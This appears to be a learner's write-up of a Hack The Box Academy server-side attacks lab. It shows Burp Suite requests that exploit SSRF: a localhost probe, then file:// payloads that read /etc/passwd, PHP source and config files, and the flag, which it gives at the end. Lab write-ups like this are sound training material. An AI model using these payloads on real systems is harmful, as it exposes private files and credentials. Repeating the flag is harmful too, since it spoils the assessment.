SERVER-SIDE ATTACKS

LogoCompleted Server-side Attacksacademy.hackthebox.com

OBJECTIVE: perform a security assessment of a client's web application to compromise back-end vulnerabilities

Obtain the flag.
#identify potential back-end vulnerabilities - SSRF, SSTI, SSI Injection, XSLT Injection
root@htb:~$ BROWSER > http://83.136.248.42:44248
 * initial investigation:
    - there are no external links to other pages found, only internal links to the same page

#identification with Burp Suite
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 * after forwarding requests, the page reaches out to an 'external' site
   api=http://truckapi.htb/?id%3DFusionExpress01
    - test SSRF to manipulate the web application into sending unauthorized requests

BURP > Proxy > Intercept > Raw
 Request
  ...
  POST / HTTP/1.1
  Host: 83.136.248.42:44248
  Content-Length: 45
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Origin: http://83.136.248.42:44248
  Referer: http://83.136.248.42:44248/

  api=http://truckapi.htb/?id%3DFusionExpress01

BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
 Request
  ...
  POST / HTTP/1.1
  Host: 83.136.248.42:44248
  Content-Length: 21
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Origin: http://83.136.248.42:44248
  Referer: http://83.136.248.42:44248/

  api=http://127.0.0.1/?id%3DFusionExpress01
   - SSRF validated, the responded w/o error and reflected the page onto itself

 Response
  ...
  HTTP 200 OK
  
#LFI:
Burp > Repeater 
 Request
  ...
  POST / HTTP/1.1
  api=file:///etc/passwd?id%3DFusionExpress01
  * Error (37): Couldn't open file /etc/passwd/
  
#LFI: read the webapp source code - PHP
BURP > Repeater
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=file:///var/www/html/index.php&date=2024-01-02
   - ALT: file:///var/www/html/config.php
  
#LFI: bypassing URL restrictions or access controls
BURP > Repeater
 Request
  ...
  POST / HTTP/1.1
  content-type: application/x-www-form-urlencoded
  api=file%3A%2F%2F%2Fetc%2Fpasswd?id%3DFusionExpress01
  
BURP > Repeater
 Request
  ...
  POST / HTTP/1.1
  api=file%3A%2F%2F%2Fflag.txt?id%3DFusionExpress01
  
  * HTB{3b8e2b940775e0267ce39d7c80488fc8}
PreviousFILE UPLOAD ATTACKSNextLOGIN BRUTE FORCING 1 & 2

Last updated